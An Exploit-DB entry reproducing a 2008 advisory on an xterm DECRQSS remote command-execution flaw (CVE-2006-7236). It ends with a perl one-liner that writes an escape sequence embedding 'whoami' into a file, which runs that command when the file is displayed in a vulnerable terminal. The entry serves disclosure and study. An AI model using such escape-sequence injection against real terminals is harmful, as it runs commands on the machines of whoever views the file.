xterm DECRQSS Remote Command Execution Vulnerability

ID EDB-ID:32690
Type exploitdb
Reporter Paul Szabo
Modified 2008-12-29T00:00:00


xterm DECRQSS Remote Command Execution Vulnerability. CVE-2006-7236 . Remote exploit for linux platform

                                            source: http://www.securityfocus.com/bid/33060/info

The 'xterm' program is prone to a remote command-execution vulnerability because it fails to sufficiently validate user input.

Successfully exploiting this issue would allow an attacker to execute arbitrary commands on an affected computer in the context of the affected application.

The issue affects xterm with patch 237; other versions may also be affected.

The following example is available:

perl -e 'print "\eP\$q\nwhoami\n\e\\"' > bla.log
cat bla.log